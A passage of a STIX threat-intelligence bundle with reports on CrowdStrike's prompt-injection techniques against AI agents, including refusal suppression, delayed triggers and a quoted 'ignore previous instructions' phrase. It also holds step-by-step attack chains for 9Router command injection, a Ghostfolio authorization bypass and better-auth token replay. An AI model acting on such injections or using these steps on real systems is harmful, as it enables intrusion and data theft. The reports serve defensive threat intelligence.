      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bbf3fd62-0e4d-5c85-ba48-039436304656",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6fcabb42-c17d-57c8-8861-9bc1862515f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--dd3ad6f6-0bb6-5fd4-854d-fcec74e180e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f393fd3f-596c-56c5-9a29-b1e413c1ef06",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Prompt Injection Techniques Targeting AI Systems and Agents",
      "description": "## Overview\n\nCrowdStrike has identified 18 new prompt injection techniques, expanding its taxonomy to over 200 distinct methods, which are being exploited by adversaries to manipulate advanced AI systems and agents. These techniques, published on July 7, 2026, enable attackers to subvert AI models, such as Google Gemini and Anthropic Claude, by injecting hidden, fragmented, or context-altering instructions. The attacks range from \"sleeping\" instructions that activate conditionally (Trigger-Activated Rule Addition, PT0201) to methods for bypassing safety filters (Cognitive Token Suppression, PT0197) and executing arbitrary commands, including SQL injection (Special Token Injection, PT0198). A critical delivery mechanism identified is \"Unwitting User Delivery\" (IM0005), where users are socially engineered into submitting malicious prompts inadvertently, causing the AI agent to operate under the user's authenticated session and execute attacker-controlled directives. This evolution in prompt injection necessitates a significant shift in AI security defenses and threat modeling.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious Prompt**: Adversaries design sophisticated prompts embedding hidden instructions, fragmented payloads, or special tokens, using techniques like `Algorithmic Payload Decomposition` (PT0200) to evade detection.\n2.  **Delivery of Malicious Prompt**: The crafted prompt is introduced into the AI system, potentially via `Unwitting User Delivery` (IM0005), where a legitimate user is socially engineered (e.g., through a TikTok post) to copy and paste the malicious input into an AI chat.\n3.  **AI System Processes Input**: The target AI model or agent (e.g., Gemini, Claude) receives and parses the input, which now contains the embedded malicious instructions within a seemingly benign context.\n4.  **Internal Manipulation/Activation**: The AI's internal mechanisms are subverted. This could involve `Special Token Injection` (PT0198) creating boundary confusion, or `Trigger-Activated Rule Addition` (PT0201) installing a \"sleeping\" instruction that activates under specific conditions.\n5.  **Bypass of Security Mechanisms**: Techniques like `Cognitive Token Suppression` (PT0197) are employed to prevent the AI from generating standard safety disclaimers or refusal messages, leading it to produce riskier or less clear outputs.\n6.  **Execution of Unauthorized Commands**: The manipulated AI agent, operating within its expanded capabilities (e.g., access to webpages, file stores, ability to write shell commands), executes the attacker's directives, such as performing SQL injection or system commands.\n7.  **Achieve Impactful Action**: The attacker achieves their objective, which may include data exfiltration, unauthorized modification of systems, or further lateral movement, leveraging the compromised AI agent as an pivot point.\n\n## Impact\n\nThe observed impact of these prompt injection techniques includes the hijacking of AI agent capabilities, execution of arbitrary commands (such as SQL injection), and the bypassing of established security rules and policies. Attackers can steer AI agents into unsafe actions, leading to potential data exfiltration or system compromise by leveraging the AI's access permissions. The increase to over 200 distinct prompt injection techniques highlights a rapidly evolving threat landscape where AI systems, if not properly secured, can become vectors for significant organizational damage. Without robust defenses, organizations leveraging AI agents could face compliance issues, data breaches, and operational disruptions.\n\n## Recommendation\n\n*   Implement comprehensive AI threat modeling that explicitly accounts for all potential sources of model context, including prompts, RAG pipelines, agent memory, APIs, tool outputs, browser content, emails, and SaaS data, to detect and mitigate potential manipulation via `Trigger-Activated Rule Addition (PT0201)`, `Algorithmic Payload Decomposition (PT0200)`, and `Special Token Injection (PT0198)`.\n*   Conduct rigorous AI red teaming exercises that move beyond basic \"ignore previous instructions\" and incorporate advanced techniques such as boundary mimicry, indirect injection, and delayed activation to proactively identify vulnerabilities related to techniques like `Cognitive Token Suppression (PT0197)`.\n*   Educate users about the risks of `Unwitting User Delivery (IM0005)` by providing examples of how malicious prompts can be disguised in social engineering campaigns, emphasizing caution when copying and pasting information into AI systems.\n*   Review and harden AI agent configurations, particularly those with access to sensitive resources or the ability to execute commands, to restrict their capabilities and ensure strict adherence to least privilege principles, mitigating the impact of successful prompt injections that lead to unauthorized command execution (as seen in the `Special Token Injection` example).\n",
      "published": "2026-07-07T19:29:24Z",
      "labels": [
        "prompt-injection",
        "ai",
        "llm",
        "threat-intelligence",
        "crowdstrike",
        "artificial-intelligence"
      ],
      "object_refs": [
        "indicator--d216c505-89cd-5135-9d62-889e27484a24",
        "indicator--fd8767a9-eb2c-5b3f-b50f-858cd83c17ff",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-uncovers-new-prompt-injection-techniques/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b66b781-4fa7-56dd-876f-0f1c7ac38fe1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5ed509a7-a8a8-50a2-bad5-dc55038ae0e5",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5c88b1d3-fc5e-5ecb-b288-5db1a47d9e81",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5ed509a7-a8a8-50a2-bad5-dc55038ae0e5",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5ed509a7-a8a8-50a2-bad5-dc55038ae0e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical OS Command Injection in 9Router (CVE-2026-59800)",
      "description": "## Overview\n\nA severe OS command injection vulnerability, tracked as CVE-2026-59800, has been identified in 9Router versions prior to 0.4.44. This flaw allows an unauthenticated remote attacker to achieve arbitrary OS command execution with root privileges. The vulnerability resides in the `POST /api/tunnel/tailscale-install` endpoint, which bypasses authorization checks. Attackers can exploit this by submitting a specially crafted `sudoPassword` field within the request body. This input is then fed directly to a `sudo -S sh` child process, which, under specific `sudo` configurations (e.g., NOPASSWD or a valid timestamp cache), interprets the malicious input as a shell command. The Shadowserver Foundation first observed evidence of in-the-wild exploitation on 2026-07-04 (UTC), indicating active threats against vulnerable 9Router instances.\n\n## Attack Chain\n\n1.  An unauthenticated attacker sends a malicious HTTP POST request to the `9Router` appliance's `/api/tunnel/tailscale-install` endpoint.\n2.  The POST request body contains a crafted `sudoPassword` field designed to inject arbitrary OS commands.\n3.  The vulnerable `9Router` application receives the request and, due to a lack of authorization checks on this specific route, processes it without authentication.\n4.  The application invokes a `sudo -S sh` child process, writing the attacker-controlled `sudoPassword` field directly to its standard input (stdin).\n5.  If `sudo` does not prompt for a password (e.g., NOPASSWD setting is configured, or a recent `sudo` timestamp cache exists), the `sh` interpreter executes the `sudoPassword` value as arbitrary shell commands.\n6.  The injected OS commands are executed with root privileges on the underlying Linux operating system of the `9Router` appliance.\n7.  The attacker achieves full system compromise, enabling data exfiltration, further lateral movement, or persistent control of the device.\n\n## Impact\n\nThe exploitation of CVE-2026-59800, with a CVSS v3.1 Base Score of 9.8 (Critical), results in complete compromise of the affected 9Router appliance. Successful exploitation grants an unauthenticated remote attacker root-level access to the underlying Linux operating system. This allows for arbitrary code execution, enabling attackers to exfiltrate sensitive network configurations, disrupt network services, establish persistent backdoors, or pivot into the internal network. Given that Shadowserver has observed active exploitation, organizations using vulnerable 9Router versions are at immediate risk of severe security breaches and operational disruption.\n\n## Recommendation\n\n*   Immediately patch `9Router` instances to version 0.4.44 or newer to address `CVE-2026-59800`.\n*   Deploy the Sigma rule provided in this brief to your SIEM to detect exploitation attempts of `CVE-2026-59800` via web server logs.\n*   Configure web server or WAF logging to capture HTTP request bodies for the `/api/tunnel/tailscale-install` endpoint, if possible, to aid in payload analysis.\n*   Review and enforce strong `sudo` configurations on Linux systems, ensuring that `NOPASSWD` is not used unnecessarily and `sudo` requires authentication.\n",
      "published": "2026-07-07T19:18:20Z",
      "labels": [
        "os-command-injection",
        "rce",
        "web-vulnerability",
        "network-appliance",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59800"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1f7953e-68a5-5be3-8970-39d66535af96",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--29316e3f-97f4-5d82-8b9d-f5699420c108",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e21a53be-0fc7-5670-8474-83751cd4947e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--29316e3f-97f4-5d82-8b9d-f5699420c108",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Transfer Data to Second-Order Effects",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--beac1614-cd59-5f10-9885-cfed779a3dda",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--29316e3f-97f4-5d82-8b9d-f5699420c108",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--29316e3f-97f4-5d82-8b9d-f5699420c108",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59708: Ghostfolio Unauthenticated Portfolio Data Exposure",
      "description": "## Overview\n\nA critical authorization bypass vulnerability, identified as CVE-2026-59708, has been discovered in the open-source personal finance dashboard, Ghostfolio. The flaw exists within the `/api/v1/public/:accessId/portfolio` API endpoint, which is intended to display public portfolios. However, the system fails to adequately validate `granteeUserId` filtering, meaning that if an attacker possesses a legitimate private `accessId`, they can bypass authentication entirely. This allows unauthenticated retrieval of comprehensive portfolio data, including holdings, quantities, buy prices, and performance metrics. This vulnerability impacts Ghostfolio versions up to and including 3.6.0. Organizations using Ghostfolio should prioritize patching to prevent sensitive financial information from being exposed.\n\n## Attack Chain\n\n1.  An attacker obtains a valid `private access ID` associated with a Ghostfolio user's private portfolio, possibly through OSINT, prior data compromise, or other means.\n2.  The attacker crafts an unauthenticated HTTP GET request directed at the vulnerable endpoint: `/api/v1/public/:accessId/portfolio`.\n3.  The attacker substitutes the obtained `private access ID` into the URL path of the GET request.\n4.  The Ghostfolio application receives and processes this unauthenticated request.\n5.  Due to the `Missing Authorization` (CWE-862) flaw, the application fails to perform proper `granteeUserId` filtering or authentication checks.\n6.  The application retrieves the full, sensitive portfolio data corresponding to the provided `accessId` from its backend.\n7.  The application responds to the attacker's unauthenticated request by returning all associated portfolio information, such as investment holdings, purchase prices, and performance data.\n\n## Impact\n\nThe successful exploitation of CVE-2026-59708 results in unauthorized access to highly sensitive financial information. Attackers can retrieve full portfolio details, including asset holdings, quantities, buy prices, and performance metrics, of any Ghostfolio user whose private `accessId` they possess. This exposure of detailed investment portfolios can lead to significant financial privacy breaches, enable targeted financial fraud, investment manipulation, or even facilitate advanced phishing campaigns. The vulnerability has a CVSS v3.1 base score of 7.5 (High), reflecting the severe confidentiality impact.\n\n## Recommendation\n\n*   Immediately patch Ghostfolio installations to a version that addresses CVE-2026-59708. Refer to the commit `https://github.com/ghostfolio/ghostfolio/commit/697ef59e3b58bebc5c21a9e482e4f5643390f316` for the fix.\n*   Review web application access logs for the `/api/v1/public/*/portfolio` endpoint for any unusual or unauthenticated access patterns, focusing on requests returning sensitive data.\n",
      "published": "2026-07-07T19:19:32Z",
      "labels": [
        "vulnerability",
        "api",
        "authorization-bypass",
        "data-exposure",
        "webserver"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59708"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/ghostfolio/ghostfolio"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/ghostfolio/ghostfolio/commit/697ef59e3b58bebc5c21a9e482e4f5643390f316"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/ghostfolio/ghostfolio/issues/7197"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/ghostfolio-unauthorized-portfolio-data-exposure-via-public-endpoint"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6448a3df-9922-5118-a7cf-0c343a13fdf6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--47f5f4f8-9e79-5d85-9009-3df8648e7b1b",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--47f5f4f8-9e79-5d85-9009-3df8648e7b1b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Better Auth OAuth Refresh Token Replay via Missing Client Authentication (CVE-2026-53512)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-53512, has been identified in the `better-auth` library, affecting applications using the deprecated `oidcProvider()` or `mcp()` plugins in versions prior to `1.6.11`. This flaw stems from a missing client authentication step during the OAuth 2.0 `refresh_token` grant for confidential clients. Unlike the `authorization_code` grant, these plugins failed to verify the `client_secret`, enabling an attacker to replay a stolen `refresh_token` and its corresponding public `client_id` to repeatedly mint new access tokens. The attacker can gain indefinite access to resources with the user's original authorized scope, as token rotation refreshes the expiration window with each call. This significantly impacts any `better-auth` application configured with confidential OAuth clients using the vulnerable plugins.\n\n## Attack Chain\n\n1.  **Initial Access / Credential Acquisition:** An attacker obtains a valid `refresh_token` and the associated public `client_id` for a confidential OAuth client. This could occur through various methods such as a database breach, log file capture, browser-side Cross-Site Scripting (XSS), or via a CORS-amplified script if exploiting the `mcp` endpoint with its wildcard `Access-Control-Allow-Origin: *`.\n2.  **Exploitation of Missing Authentication:** The attacker sends a `POST` request to the vulnerable OAuth 2.0 token endpoint (e.g., `/api/auth/oauth2/token` or `/api/auth/mcp/token`) using the stolen `refresh_token` and `client_id`, but crucially, *without* providing the `client_secret`.\n3.  **Token Endpoint Bypass:** Due to the flaw in `better-auth` versions prior to 1.6.11, the `oidcProvider` or `mcp` plugins do not enforce `client_secret` verification on the `refresh_token` grant for confidential clients, allowing the unauthenticated request to proceed.\n4.  **Access Token Minting:** The vulnerable token endpoint issues a new, valid `access_token` to the attacker, along with a rotated `refresh_token`.\n5.  **Indefinite Session Prolongation:** The attacker uses the newly minted `refresh_token` to repeat steps 2-4, effectively resetting the expiration window of the session and gaining indefinite access.\n6.  **Resource Access:** With the valid `access_token`, the attacker can impersonate the legitimate client and user, making requests to resource servers to access, modify, or exfiltrate data within the scope of the original user's authorization.\n\n## Impact\n\nThe impact of CVE-2026-53512 is significant, primarily leading to indefinite confidential-client impersonation. An attacker who has acquired a single `refresh_token` and the corresponding `client_id` can continuously mint new `access_tokens` and rotate `refresh_tokens`, thereby maintaining persistent unauthorized access without further authentication. Each newly issued `access_token` carries the original user's authorized scope, granting the attacker the ability to read, write, or otherwise manipulate data on resource servers as if they were the legitimate user. This can result in severe data breaches, unauthorized modifications, and complete compromise of data governed by the affected OAuth client's permissions. The vulnerability affects `better-auth` applications leveraging the deprecated `oidcProvider` or `mcp` plugins.\n\n## Recommendation\n\n*   **Upgrade immediately** to `better-auth@1.6.11` or later to apply the official patch for CVE-2026-53512.\n*   **Migrate from deprecated plugins** by transitioning from `oidcProvider()` to the canonical `@better-auth/oauth-provider` package, as it enforces client authentication on all grants by default.\n*   **Implement network-layer ingress restriction** for `/api/auth/oauth2/token` and `/api/auth/mcp/token` endpoints to known client IPs at the load balancer, which can partially mitigate risk for server-to-server flows.\n*   **Force all clients to public + PKCE** by setting every client's `type: \"public\"` and requiring PKCE, thereby eliminating the `client_secret` for verification where the bug manifests.\n*   **For the mcp endpoint specifically**, drop the wildcard CORS header at an upstream proxy and replace it with a tight allowlist to prevent CORS-amplified attacks.\n",
      "published": "2026-07-07T20:15:52Z",
      "labels": [
        "oauth",
        "authentication-bypass",
        "vulnerability",
        "web",
        "better-auth"
      ],
      "object_refs": [
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-pw9m-5jxm-xr6h"
        },
        {
          "source_name": "reference",
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-53512"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/rfc6749#section-6"
        },
        {
          "source_name": "reference",
          "url": "https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1#section-4.3"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe59f2db-4a4a-55be-8ada-b4b3b0aafc46",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d0c41c7f-2299-5ada-9ddf-e9119f12ee26",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb38fe15-f75e-54be-9c3c-0833b0a643ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d0c41c7f-2299-5ada-9ddf-e9119f12ee26",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d6613c04-c3d0-5f5d-a662-7a4914c24a86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d0c41c7f-2299-5ada-9ddf-e9119f12ee26",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3c1887cd-ce66-58fe-92ba-d4f375e8d81a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d0c41c7f-2299-5ada-9ddf-e9119f12ee26",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Event Triggered Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1546",
          "url": "https://attack.mitre.org/techniques/T1546"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--073da146-4e28-5868-9171-814796ac98f8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d0c41c7f-2299-5ada-9ddf-e9119f12ee26",
      "target_ref": "attack-pattern--1c2f2ef4-96d1-5f02-86f0-bf0721251ef2"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7967e23a-b7f0-5548-8a97-790f5974cdf4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d0c41c7f-2299-5ada-9ddf-e9119f12ee26",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d0c41c7f-2299-5ada-9ddf-e9119f12ee26",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CrowdStrike Uncovers New Prompt Injection Techniques Targeting AI Agents",
      "description": "## Overview\n\nCrowdStrike’s AI security research team has uncovered 18 new prompt injection techniques, expanding their taxonomy to over 200 distinct methods, reflecting the evolving landscape of adversarial AI. These techniques enable attackers to manipulate AI agents by exploiting language, context, and data trusted by these systems. As organizations deploy more powerful AI agents capable of web crawling, file access, and even shell command execution, indirect prompt injection has emerged as a critical threat vector. Attackers can hide these injections within the data consumed by AI agents, allowing them to hijack agent capabilities for malicious purposes. This brief highlights five specific techniques: Trigger-Activated Rule Addition (PT0201), Cognitive Token Suppression (PT0197), Algorithmic Payload Decomposition (PT0200), Special Token Injection (PT0198), and Unwitting User Delivery (IM0005).\n\n## Attack Chain\n\n1.  **Preparation of Malicious Prompt**: Attacker crafts a prompt using techniques like \"Trigger-Activated Rule Addition\", \"Cognitive Token Suppression\", \"Algorithmic Payload Decomposition\", or \"Special Token Injection\" to embed hidden or fragmented instructions designed to manipulate the AI agent.\n2.  **Delivery of Malicious Prompt**: The specially crafted input is delivered to the AI agent, either directly by an unsuspecting user (via \"Unwitting User Delivery\" through social engineering) or indirectly through data the agent processes, such as a malicious file or webpage crawled by the agent.\n3.  **AI Agent Ingestion and Interpretation**: The AI agent ingests the provided data or prompt, attempting to interpret and integrate the attacker's hidden instructions into its current operational context or memory, often without recognizing the malicious intent.\n4.  **Bypass of Safety Mechanisms**: The embedded malicious instructions, such as those leveraging \"Cognitive Token Suppression\" or \"Algorithmic Payload Decomposition\", cause the AI agent to bypass its internal safety filters, refusal policies, or content moderation, clearing the way for unintended actions.\n5.  **Execution of Malicious Instructions**: The AI agent, now compromised or manipulated, executes the attacker's hidden directives. For \"Trigger-Activated Rule Addition\", this step occurs when a specific future event, phrase, or condition during the AI's operation activates the embedded malicious instruction.\n6.  **Achievement of Attacker Objective**: The AI agent's manipulated behavior leads to the attacker's objective, which can include data exfiltration (e.g., sending emails to an attacker-controlled address), arbitrary command execution (e.g., SQL queries), or generating harmful content (e.g., instructions for unsafe activities).\n\n## Impact\n\nThe described prompt injection techniques enable adversaries to achieve a range of malicious outcomes, turning AI agents into tools for attackers. Observed impacts include the manipulation of AI system behavior, bypassing of critical safety and refusal 